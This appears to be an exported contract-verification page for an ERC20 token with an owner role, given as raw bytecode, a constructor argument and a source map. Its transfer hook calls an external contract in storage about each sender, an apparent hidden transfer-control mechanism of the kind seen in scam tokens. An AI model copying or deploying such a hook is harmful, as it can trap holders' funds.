0fd0565b8114611afa57600080fd5b50565b600081519050611b0c81611ae6565b92915050565b600060208284031215611b2857611b27610ef2565b5b6000611b3684828501611afd565b9150509291505056fea2646970667358221220941affb6f54591e093e6ae8e7fa40d18e0453558d81a5c4f053826719cfe5a5d64736f6c634300081200330000000000000000000000007fb6020d6e13757d1b21a85cb34f6d03dac30e0d

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106101005760003560e01c8063715018a611610097578063a9059cbb11610066578063a9059cbb146102b1578063bf40b498146102e1578063dd62ed3e146102fd578063f2fde38b1461032d57610100565b8063715018a61461023b5780638da5cb5b1461024557806395d89b4114610263578063a457c2d71461028157610100565b806323b872dd116100d357806323b872dd1461018d578063313ce567146101bd57806339509351146101db57806370a082311461020b57610100565b806306fdde0314610105578063095ea7b31461012357806318160ddd146101535780632148130e14610171575b600080fd5b61010d610349565b60405161011a9190610ec6565b60405180910390f35b61013d60048036038101906101389190610f90565b6103db565b60405161014a9190610feb565b60405180910390f35b61015b6103fe565b6040516101689190611015565b60405180910390f35b61018b60048036038101906101869190611165565b610408565b005b6101a760048036038101906101a291906111ae565b61041b565b6040516101b49190610feb565b60405180910390f35b6101c561044a565b6040516101d2919061121d565b60405180910390f35b6101f560048036038101906101f09190610f90565b610453565b6040516102029190610feb565b60405180910390f35b61022560048036038101906102209190611238565b61048a565b6040516102329190611015565b60405180910390f35b6102436104d3565b005b61024d6104e7565b60405161025a9190611274565b60405180910390f35b61026b610510565b6040516102789190610ec6565b60405180910390f35b61029b60048036038101906102969190610f90565b6105a2565b6040516102a89190610feb565b60405180910390f35b6102cb60048036038101906102c69190610f90565b610619565b6040516102d89190610feb565b60405180910390f35b6102fb60048036038101906102f69190611165565b61063c565b005b6103176004803603810190610312919061128f565b61064f565b6040516103249190611015565b60405180910390f35b61034760048036038101906103429190611238565b6106d6565b005b606060058054610358906112fe565b80601f0160208091040260200160405190810160405280929190818152602001828054610384906112fe565b80156103d15780601f106103a6576101008083540402835291602001916103d1565b820191906000526020600020905b8154815290600101906020018083116103b457829003601f168201915b5050505050905090565b6000806103e6610759565b90506103f3818585610761565b600191505092915050565b6000600454905090565b806009908161041791906114db565b5050565b600080610426610759565b905061043385828561092a565b61043e8585856109b6565b60019150509392505050565b60006012905090565b60008061045e610759565b905061047f818585610470858961064f565b61047a91906115dc565b610761565b600191505092915050565b6000600160008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020549050919050565b6104db610c2f565b6104e56000610cad565b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b60606006805461051f906112fe565b80601f016020809104026020016040519081016040528092919081815260200182805461054b906112fe565b80156105985780601f1061056d57610100808354040283529160200191610598565b820191906000526020600020905b81548152906001019060200180831161057b57829003601f168201915b5050505050905090565b6000806105ad610759565b905060006105bb828661064f565b905083811015610600576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016105f790611682565b60405180910390fd5b61060d8286868403610761565b60019250505092915050565b600080610624610759565b90506106318185856109b6565b600191505092915050565b806008908161064b91906114db565b5050565b6000600360008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905092915050565b6106de610c2f565b600073ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff160361074d576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161074490611714565b60405180910390fd5b61075681610cad565b50565b600033905090565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036107d0576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016107c7906117a6565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160361083f576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161083690611838565b60405180910390fd5b80600360008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002060008473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b9258360405161091d9190611015565b60405180910390a3505050565b6000610936848461064f565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff81146109b057818110156109a2576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610999906118a4565b60405180910390fd5b6109af8484848403610761565b5b50505050565b600073ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610a25576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a1c90611936565b60405180910390fd5b600073ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610a94576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610a8b906119c8565b60405180910390fd5b610a9f838383610d71565b6000600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff16815260200190815260200160002054905081811015610b26576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b1d90611a5a565b60405180910390fd5b818103600160008673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020016000208190555081600160008573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff168152602001908152602001600020600082825401925050819055508273ffffffffffffffffffffffffffffffffffffffff168473ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef84604051610c169190611015565b60405180910390a3610c29848484610e31565b50505050565b610c37610759565b73ffffffffffffffffffffffffffffffffffffffff16610c556104e7565b73ffffffffffffffffffffffffffffffffffffffff1614610cab576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610ca290611ac6565b60405180910390fd5b565b60008060009054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050816000806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b6000600260009054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1663414ac230856040518263ffffffff1660e01b8152600401610dce9190611274565b602060405180830381865afa158015610deb573d6000803e3d6000fd5b505050506040513d601f19601f82011682018060405250810190610e0f9190611b12565b905060008115610e2a5780925060008311610e2957600080fd5b5b5050505050565b505050565b600081519050919050565b600082825260208201905092915050565b60005b83811015610e70578082015181840152602081019050610e55565b60008484015250505050565b6000601f19601f8301169050919050565b6000610e9882610e36565b610ea28185610e41565b9350610eb2818560208601610e52565b610ebb81610e7c565b840191505092915050565b60006020820190508181036000830152610ee08184610e8d565b905092915050565b6000604051905090565b600080fd5b600080fd5b600073ffffffffffffffffffffffffffffffffffffffff82169050919050565b6000610f2782610efc565b9050919050565b610f3781610f1c565b8114610f4257600080fd5b50565b600081359050610f5481610f2e565b92915050565b6000819050919050565b610f6d81610f5a565b8114610f7857600080fd5b50565b600081359050610f8a81610f64565b92915050565b60008060408385031215610fa757610fa6610ef2565b5b6000610fb585828601610f45565b9250506020610fc685828601610f7b565b9150509250929050565b60008115159050919050565b610fe581610fd0565b82525050565b60006020820190506110006000830184610fdc565b92915050565b61100f81610f5a565b82525050565b600060208201905061102a6000830184611006565b92915050565b600080fd5b600080fd5b7f4e487b7100000000000000000000000000000000000000000000000000000000600052604160045260246000fd5b61107282610e7c565b810181811067ffffffffffffffff821117156110915761109061103a565b5b80604052505050565b60006110a4610ee8565b90506110b08282611069565b919050565b600067ffffffffffffffff8211156110d0576110cf61103a565b5b6110d982610e7c565b9050602081019050919050565b82818337600083830152505050565b6000611108611103846110b5565b61109a565b90508281526020810184848401111561112457611123611035565b5b61112f8482856110e6565b509392505050565b600082601f83011261114c5761114b611030565b5b813561115c8482602086016110f5565b91505092915050565b60006020828403121561117b5761117a610ef2565b5b600082013567ffffffffffffffff81111561119957611198610ef7565b5b6111a584828501611137565b91505092915050565b6000806000606084860312156111c7576111c6610ef2565b5b60006111d586828701610f45565b93505060206111e686828701610f45565b92505060406111f786828701610f7b565b9150509250925092565b600060ff82169050919050565b61121781611201565b82525050565b6000602082019050611232600083018461120e565b92915050565b60006020828403121561124e5761124d610ef2565b5b600061125c84828501610f45565b91505092915050565b61126e81610f1c565b82525050565b60006020820190506112896000830184611265565b92915050565b600080604083850312156112a6576112a5610ef2565b5b60006112b485828601610f45565b92505060206112c585828601610f45565b9150509250929050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052602260045260246000fd5b6000600282049050600182168061131657607f821691505b602082108103611329576113286112cf565b5b50919050565b60008190508160005260206000209050919050565b60006020601f8301049050919050565b600082821b905092915050565b6000600883026113917fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82611354565b61139b8683611354565b95508019841693508086168417925050509392505050565b6000819050919050565b60006113d86113d36113ce84610f5a565b6113b3565b610f5a565b9050919050565b6000819050919050565b6113f2836113bd565b6114066113fe826113df565b848454611361565b825550505050565b600090565b61141b61140e565b6114268184846113e9565b505050565b5b8181101561144a5761143f600082611413565b60018101905061142c565b5050565b601f82111561148f576114608161132f565b61146984611344565b81016020851015611478578190505b61148c61148485611344565b83018261142b565b50505b505050565b600082821c905092915050565b60006114b260001984600802611494565b1980831691505092915050565b60006114cb83836114a1565b9150826002028217905092915050565b6114e482610e36565b67ffffffffffffffff8111156114fd576114fc61103a565b5b61150782546112fe565b61151282828561144e565b600060209050601f8311600181146115455760008415611533578287015190505b61153d85826114bf565b8655506115a5565b601f1984166115538661132f565b60005b8281101561157b57848901518255600182019150602085019450602081019050611556565b868310156115985784890151611594601f8916826114a1565b8355505b6001600288020188555050505b505050505050565b7f4e487b7100000000000000000000000000000000000000000000000000000000600052601160045260246000fd5b60006115e782610f5a565b91506115f283610f5a565b925082820190508082111561160a576116096115ad565b5b92915050565b7f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f7760008201527f207a65726f000000000000000000000000000000000000000000000000000000602082015250565b600061166c602583610e41565b915061167782611610565b604082019050919050565b6000602082019050818103600083015261169b8161165f565b9050919050565b7f4f776e61626c653a206e6577206f776e657220697320746865207a65726f206160008201527f6464726573730000000000000000000000000000000000000000000000000000602082015250565b60006116fe602683610e41565b9150611709826116a2565b604082019050919050565b6000602082019050818103600083015261172d816116f1565b9050919050565b7f45524332303a20617070726f76652066726f6d20746865207a65726f2061646460008201527f7265737300000000000000000000000000000000000000000000000000000000602082015250565b6000611790602483610e41565b915061179b82611734565b604082019050919050565b600060208201905081810360008301526117bf81611783565b9050919050565b7f45524332303a20617070726f766520746f20746865207a65726f20616464726560008201527f7373000000000000000000000000000000000000000000000000000000000000602082015250565b6000611822602283610e41565b915061182d826117c6565b604082019050919050565b6000602082019050818103600083015261185181611815565b9050919050565b7f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000600082015250565b600061188e601d83610e41565b915061189982611858565b602082019050919050565b600060208201905081810360008301526118bd81611881565b9050919050565b7f45524332303a207472616e736665722066726f6d20746865207a65726f20616460008201527f6472657373000000000000000000000000000000000000000000000000000000602082015250565b6000611920602583610e41565b915061192b826118c4565b604082019050919050565b6000602082019050818103600083015261194f81611913565b9050919050565b7f45524332303a207472616e7366657220746f20746865207a65726f206164647260008201527f6573730000000000000000000000000000000000000000000000000000000000602082015250565b60006119b2602383610e41565b91506119bd82611956565b604082019050919050565b600060208201905081810360008301526119e1816119a5565b9050919050565b7f45524332303a207472616e7366657220616d6f756e742065786365656473206260008201527f616c616e63650000000000000000000000000000000000000000000000000000602082015250565b6000611a44602683610e41565b9150611a4f826119e8565b604082019050919050565b60006020820190508181036000830152611a7381611a37565b9050919050565b7f4f776e61626c653a2063616c6c6572206973206e6f7420746865206f776e6572600082015250565b6000611ab0602083610e41565b9150611abb82611a7a565b602082019050919050565b60006020820190508181036000830152611adf81611aa3565b9050919050565b611aef81610fd0565b8114611afa57600080fd5b50565b600081519050611b0c81611ae6565b92915050565b600060208284031215611b2857611b27610ef2565b5b6000611b3684828501611afd565b9150509291505056fea2646970667358221220941affb6f54591e093e6ae8e7fa40d18e0453558d81a5c4f053826719cfe5a5d64736f6c63430008120033

Constructor Arguments (ABI-Encoded and is the last bytes of the Contract Creation Code above)

0000000000000000000000007fb6020d6e13757d1b21a85cb34f6d03dac30e0d

-----Decoded View---------------
Arg [0] : team_add (address): 0x7FB6020d6e13757D1B21a85cB34F6D03DAc30E0D

-----Encoded View---------------
1 Constructor Arguments found :
Arg [0] : 0000000000000000000000007fb6020d6e13757d1b21a85cb34f6d03dac30e0d


Deployed Bytecode Sourcemap

5086:7893:0:-:0;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6190:100;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7604:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6681:108;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6042:78;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;8577:295;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6523:93;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8887:238;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6852:131;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3364:103;;;:::i;:::-;;3059:87;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;6409:104;;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;8131:436;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;7189:193;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;12767:75;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;7445:151;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;;;;;;:::i;:::-;;;;;;;;3624:201;;;;;;;;;;;;;:::i;:::-;;:::i;:::-;;6190:100;6244:13;6277:5;6270:12;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6190:100;:::o;7604:201::-;7687:4;7704:13;7720:12;:10;:12::i;:::-;7704:28;;7743:32;7752:5;7759:7;7768:6;7743:8;:32::i;:::-;7793:4;7786:11;;;7604:201;;;;:::o;6681:108::-;6742:7;6769:12;;6762:19;;6681:108;:::o;6042:78::-;6108:4;6098:7;:14;;;;;;:::i;:::-;;6042:78;:::o;8577:295::-;8708:4;8725:15;8743:12;:10;:12::i;:::-;8725:30;;8766:38;8782:4;8788:7;8797:6;8766:15;:38::i;:::-;8815:27;8825:4;8831:2;8835:6;8815:9;:27::i;:::-;8860:4;8853:11;;;8577:295;;;;;:::o;6523:93::-;6581:5;6606:2;6599:9;;6523:93;:::o;8887:238::-;8975:4;8992:13;9008:12;:10;:12::i;:::-;8992:28;;9031:64;9040:5;9047:7;9084:10;9056:25;9066:5;9073:7;9056:9;:25::i;:::-;:38;;;;:::i;:::-;9031:8;:64::i;:::-;9113:4;9106:11;;;8887:238;;;;:::o;6852:131::-;6928:7;6955:9;:20;6965:9;6955:20;;;;;;;;;;;;;;;;6948:27;;6852:131;;;:::o;3364:103::-;2945:13;:11;:13::i;:::-;3429:30:::1;3456:1;3429:18;:30::i;:::-;3364:103::o:0;3059:87::-;3105:7;3132:6;;;;;;;;;;;3125:13;;3059:87;:::o;6409:104::-;6465:13;6498:7;6491:14;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;6409:104;:::o;8131:436::-;8224:4;8241:13;8257:12;:10;:12::i;:::-;8241:28;;8280:24;8307:25;8317:5;8324:7;8307:9;:25::i;:::-;8280:52;;8371:15;8351:16;:35;;8343:85;;;;;;;;;;;;:::i;:::-;;;;;;;;;8464:60;8473:5;8480:7;8508:15;8489:16;:34;8464:8;:60::i;:::-;8555:4;8548:11;;;;8131:436;;;;:::o;7189:193::-;7268:4;7285:13;7301:12;:10;:12::i;:::-;7285:28;;7324;7334:5;7341:2;7345:6;7324:9;:28::i;:::-;7370:4;7363:11;;;7189:193;;;;:::o;12767:75::-;12830:4;12820:7;:14;;;;;;:::i;:::-;;12767:75;:::o;7445:151::-;7534:7;7561:11;:18;7573:5;7561:18;;;;;;;;;;;;;;;:27;7580:7;7561:27;;;;;;;;;;;;;;;;7554:34;;7445:151;;;;:::o;3624:201::-;2945:13;:11;:13::i;:::-;3733:1:::1;3713:22;;:8;:22;;::::0;3705:73:::1;;;;;;;;;;;;:::i;:::-;;;;;;;;;3789:28;3808:8;3789:18;:28::i;:::-;3624:201:::0;:::o;263:98::-;316:7;343:10;336:17;;263:98;:::o;11312:380::-;11465:1;11448:19;;:5;:19;;;11440:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11546:1;11527:21;;:7;:21;;;11519:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;11630:6;11600:11;:18;11612:5;11600:18;;;;;;;;;;;;;;;:27;11619:7;11600:27;;;;;;;;;;;;;;;:36;;;;11668:7;11652:32;;11661:5;11652:32;;;11677:6;11652:32;;;;;;:::i;:::-;;;;;;;;11312:380;;;:::o;11983:453::-;12118:24;12145:25;12155:5;12162:7;12145:9;:25::i;:::-;12118:52;;12205:17;12185:16;:37;12181:248;;12267:6;12247:16;:26;;12239:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;12351:51;12360:5;12367:7;12395:6;12376:16;:25;12351:8;:51::i;:::-;12181:248;12107:329;11983:453;;;:::o;10173:838::-;10320:1;10304:18;;:4;:18;;;10296:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;10397:1;10383:16;;:2;:16;;;10375:64;;;;;;;;;;;;:::i;:::-;;;;;;;;;10450:38;10471:4;10477:2;10481:6;10450:20;:38::i;:::-;10501:19;10523:9;:15;10533:4;10523:15;;;;;;;;;;;;;;;;10501:37;;10572:6;10557:11;:21;;10549:72;;;;;;;;;;;;:::i;:::-;;;;;;;;;10689:6;10675:11;:20;10657:9;:15;10667:4;10657:15;;;;;;;;;;;;;;;:38;;;;10892:6;10875:9;:13;10885:2;10875:13;;;;;;;;;;;;;;;;:23;;;;;;;;;;;10942:2;10927:26;;10936:4;10927:26;;;10946:6;10927:26;;;;;;:::i;:::-;;;;;;;;10966:37;10986:4;10992:2;10996:6;10966:19;:37::i;:::-;10285:726;10173:838;;;:::o;3224:132::-;3299:12;:10;:12::i;:::-;3288:23;;:7;:5;:7::i;:::-;:23;;;3280:68;;;;;;;;;;;;:::i;:::-;;;;;;;;;3224:132::o;3987:191::-;4061:16;4080:6;;;;;;;;;;;4061:25;;4106:8;4097:6;;:17;;;;;;;;;;;;;;;;;;4161:8;4130:40;;4151:8;4130:40;;;;;;;;;;;;4050:128;3987:191;:::o;12448:307::-;12582:13;12598:9;;;;;;;;;;;:18;;;12617:4;12598:24;;;;;;;;;;;;;;;:::i;:::-;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;:::i;:::-;12582:40;;12633:13;12664:8;12661:87;;;12697:5;12688:14;;12734:1;12725:6;:10;12717:19;;;;;;12661:87;12571:184;;12448:307;;;:::o;12852:124::-;;;;:::o;7:99:1:-;59:6;93:5;87:12;77:22;;7:99;;;:::o;112:169::-;196:11;230:6;225:3;218:19;270:4;265:3;261:14;246:29;;112:169;;;;:::o;287:246::-;368:1;378:113;392:6;389:1;386:13;378:113;;;477:1;472:3;468:11;462:18;458:1;453:3;449:11;442:39;414:2;411:1;407:10;402:15;;378:113;;;525:1;516:6;511:3;507:16;500:27;349:184;287:246;;;:::o;539:102::-;580:6;631:2;627:7;622:2;615:5;611:14;607:28;597:38;;539:102;;;:::o;647:377::-;735:3;763:39;796:5;763:39;:::i;:::-;818:71;882:6;877:3;818:71;:::i;:::-;811:78;;898:65;956:6;951:3;944:4;937:5;933:16;898:65;:::i;:::-;988:29;1010:6;988:29;:::i;:::-;983:3;979:39;972:46;;739:285;647:377;;;;:::o;1030:313::-;1143:4;1181:2;1170:9;1166:18;1158:26;;1230:9;1224:4;1220:20;1216:1;1205:9;1201:17;1194:47;1258:78;1331:4;1322:6;1258:78;:::i;:::-;1250:86;;1030:313;;;;:::o;1349:75::-;1382:6;1415:2;1409:9;1399:19;;1349:75;:::o;1430:117::-;1539:1;1536;1529:12;1553:117;1662:1;1659;1652:12;1676:126;1713:7;1753:42;1746:5;1742:54;1731:65;;1676:126;;;:::o;1808:96::-;1845:7;1874:24;1892:5;1874:24;:::i;:::-;1863:35;;1808:96;;;:::o;1910:122::-;1983:24;2001:5;1983:24;:::i;:::-;1976:5;1973:35;1963:63;;2022:1;2019;2012:12;1963:63;1910:122;:::o;2038:139::-;2084:5;2122:6;2109:20;2100:29;;2138:33;2165:5;2138:33;:::i;:::-;2038:139;;;;:::o;2183:77::-;2220:7;2249:5;2238:16;;2183:77;;;:::o;2266:122::-;2339:24;2357:5;2339:24;:::i;:::-;2332:5;2329:35;2319:63;;2378:1;2375;2368:12;2319:63;2266:122;:::o;2394:139::-;2440:5;2478:6;2465:20;2456:29;;2494:33;2521:5;2494:33;:::i;:::-;2394:139;;;;:::o;2539:474::-;2607:6;2615;2664:2;2652:9;2643:7;2639:23;2635:32;2632:119;;;2670:79;;:::i;:::-;2632:119;2790:1;2815:53;2860:7;2851:6;2840:9;2836:22;2815:53;:::i;:::-;2805:63;;2761:117;2917:2;2943:53;2988:7;2979:6;2968:9;2964:22;2943:53;:::i;:::-;2933:63;;2888:118;2539:474;;;;;:::o;3019:90::-;3053:7;3096:5;3089:13;3082:21;3071:32;;3019:90;;;:::o;3115:109::-;3196:21;3211:5;3196:21;:::i;:::-;3191:3;3184:34;3115:109;;:::o;3230:210::-;3317:4;3355:2;3344:9;3340:18;3332:26;;3368:65;3430:1;3419:9;3415:17;3406:6;3368:65;:::i;:::-;3230:210;;;;:::o;3446:118::-;3533:24;3551:5;3533:24;:::i;:::-;3528:3;3521:37;3446:118;;:::o;3570:222::-;3663:4;3701:2;3690:9;3686:18;3678:26;;3714:71;3782:1;3771:9;3767:17;3758:6;3714:71;:::i;:::-;3570:222;;;;:::o;3798:117::-;3907:1;3904;3897:12;3921:117;4030:1;4027;4020:12;4044:180;4092:77;4089:1;4082:88;4189:4;4186:1;4179:15;4213:4;4210:1;4203:15;4230:281;4313:27;4335:4;4313:27;:::i;:::-;4305:6;4301:40;4443:6;4431:10;4428:22;4407:18;4395:10;4392:34;4389:62;4386:88;;;4454:18;;:::i;:::-;4386:88;4494:10;4490:2;4483:22;4273:238;4230:281;;:::o;4517:129::-;4551:6;4578:20;;:::i;:::-;4568:30;;4607:33;4635:4;4627:6;4607:33;:::i;:::-;4517:129;;;:::o;4652:308::-;4714:4;4804:18;4796:6;4793:30;4790:56;;;4826:18;;:::i;:::-;4790:56;4864:29;4886:6;4864:29;:::i;:::-;4856:37;;4948:4;4942;4938:15;4930:23;;4652:308;;;:::o;4966:146::-;5063:6;5058:3;5053;5040:30;5104:1;5095:6;5090:3;5086:16;5079:27;4966:146;;;:::o;5118:425::-;5196:5;5221:66;5237:49;5279:6;5237:49;:::i;:::-;5221:66;:::i;:::-;5212:75;;5310:6;5303:5;5296:21;5348:4;5341:5;5337:16;5386:3;5377:6;5372:3;5368:16;5365:25;5362:112;;;5393:79;;:::i;:::-;5362:112;5483:54;5530:6;5525:3;5520;5483:54;:::i;:::-;5202:341;5118:425;;;;;:::o;5563:340::-;5619:5;5668:3;5661:4;5653:6;5649:17;5645:27;5635:122;;5676:79;;:::i;:::-;5635:122;5793:6;5780:20;5818:79;5893:3;5885:6;5878:4;5870:6;5866:17;5818:79;:::i;:::-;5809:88;;5625:278;5563:340;;;;:::o;5909:509::-;5978:6;6027:2;6015:9;6006:7;6002:23;5998:32;5995:119;;;6033:79;;:::i;:::-;5995:119;6181:1;6170:9;6166:17;6153:31;6211:18;6203:6;6200:30;6197:117;;;6233:79;;:::i;:::-;6197:117;6338:63;6393:7;6384:6;6373:9;6369:22;6338:63;:::i;:::-;6328:73;;6124:287;5909:509;;;;:::o;6424:619::-;6501:6;6509;6517;6566:2;6554:9;6545:7;6541:23;6537:32;6534:119;;;6572:79;;:::i;:::-;6534:119;6692:1;6717:53;6762:7;6753:6;6742:9;6738:22;6717:53;:::i;:::-;6707:63;;6663:117;6819:2;6845:53;6890:7;6881:6;6870:9;6866:22;6845:53;:::i;:::-;6835:63;;6790:118;6947:2;6973:53;7018:7;7009:6;6998:9;6994:22;6973:53;:::i;:::-;6963:63;;6918:118;6424:619;;;;;:::o;7049:86::-;7084:7;7124:4;7117:5;7113:16;7102:27;;7049:86;;;:::o;7141:112::-;7224:22;7240:5;7224:22;:::i;:::-;7219:3;7212:35;7141:112;;:::o;7259:214::-;7348:4;7386:2;7375:9;7371:18;7363:26;;7399:67;7463:1;7452:9;7448:17;7439:6;7399:67;:::i;:::-;7259:214;;;;:::o;7479:329::-;7538:6;7587:2;7575:9;7566:7;7562:23;7558:32;7555:119;;;7593:79;;:::i;:::-;7555:119;7713:1;7738:53;7783:7;7774:6;7763:9;7759:22;7738:53;:::i;:::-;7728:63;;7684:117;7479:329;;;;:::o;7814:118::-;7901:24;7919:5;7901:24;:::i;:::-;7896:3;7889:37;7814:118;;:::o;7938:222::-;8031:4;8069:2;8058:9;8054:18;8046:26;;8082:71;8150:1;8139:9;8135:17;8126:6;8082:71;:::i;:::-;7938:222;;;;:::o;8166:474::-;8234:6;8242;8291:2;8279:9;8270:7;8266:23;8262:32;8259:119;;;8297:79;;:::i;:::-;8259:119;8417:1;8442:53;8487:7;8478:6;8467:9;8463:22;8442:53;:::i;:::-;8432:63;;8388:117;8544:2;8570:53;8615:7;8606:6;8595:9;8591:22;8570:53;:::i;:::-;8560:63;;8515:118;8166:474;;;;;:::o;8646:180::-;8694:77;8691:1;8684:88;8791:4;8788:1;8781:15;8815:4;8812:1;8805:15;8832:320;8876:6;8913:1;8907:4;8903:12;8893:22;;8960:1;8954:4;8950:12;8981:18;8971:81;;9037:4;9029:6;9025:17;9015:27;;8971:81;9099:2;9091:6;9088:14;9068:18;9065:38;9062:84;;9118:18;;:::i;:::-;9062:84;8883:269;8832:320;;;:::o;9158:141::-;9207:4;9230:3;9222:11;;9253:3;9250:1;9243:14;9287:4;9284:1;9274:18;9266:26;;9158:141;;;:::o;9305:93::-;9342:6;9389:2;9384;9377:5;9373:14;9369:23;9359:33;;9305:93;;;:::o;9404:107::-;9448:8;9498:5;9492:4;9488:16;9467:37;;9404:107;;;;:::o;9517:393::-;9586:6;9636:1;9624:10;9620:18;9659:97;9689:66;9678:9;9659:97;:::i;:::-;9777:39;9807:8;9796:9;9777:39;:::i;:::-;9765:51;;9849:4;9845:9;9838:5;9834:21;9825:30;;9898:4;9888:8;9884:19;9877:5;9874:30;9864:40;;9593:317;;9517:393;;;;;:::o;9916:60::-;9944:3;9965:5;9958:12;;9916:60;;;:::o;9982:142::-;10032:9;10065:53;10083:34;10092:24;10110:5;10092:24;:::i;:::-;10083:34;:::i;:::-;10065:53;:::i;:::-;10052:66;;9982:142;;;:::o;10130:75::-;10173:3;10194:5;10187:12;;10130:75;;;:::o;10211:269::-;10321:39;10352:7;10321:39;:::i;:::-;10382:91;10431:41;10455:16;10431:41;:::i;:::-;10423:6;10416:4;10410:11;10382:91;:::i;:::-;10376:4;10369:105;10287:193;10211:269;;;:::o;10486:73::-;10531:3;10486:73;:::o;10565:189::-;10642:32;;:::i;:::-;10683:65;10741:6;10733;10727:4;10683:65;:::i;:::-;10618:136;10565:189;;:::o;10760:186::-;10820:120;10837:3;10830:5;10827:14;10820:120;;;10891:39;10928:1;10921:5;10891:39;:::i;:::-;10864:1;10857:5;10853:13;10844:22;;10820:120;;;10760:186;;:::o;10952:543::-;11053:2;11048:3;11045:11;11042:446;;;11087:38;11119:5;11087:38;:::i;:::-;11171:29;11189:10;11171:29;:::i;:::-;11161:8;11157:44;11354:2;11342:10;11339:18;11336:49;;;11375:8;11360:23;;11336:49;11398:80;11454:22;11472:3;11454:22;:::i;:::-;11444:8;11440:37;11427:11;11398:80;:::i;:::-;11057:431;;11042:446;10952:543;;;:::o;11501:117::-;11555:8;11605:5;11599:4;11595:16;11574:37;;11501:117;;;;:::o;11624:169::-;11668:6;11701:51;11749:1;11745:6;11737:5;11734:1;11730:13;11701:51;:::i;:::-;11697:56;11782:4;11776;11772:15;11762:25;;11675:118;11624:169;;;;:::o;11798:295::-;11874:4;12020:29;12045:3;12039:4;12020:29;:::i;:::-;12012:37;;12082:3;12079:1;12075:11;12069:4;12066:21;12058:29;;11798:295;;;;:::o;12098:1395::-;12215:37;12248:3;12215:37;:::i;:::-;12317:18;12309:6;12306:30;12303:56;;;12339:18;;:::i;:::-;12303:56;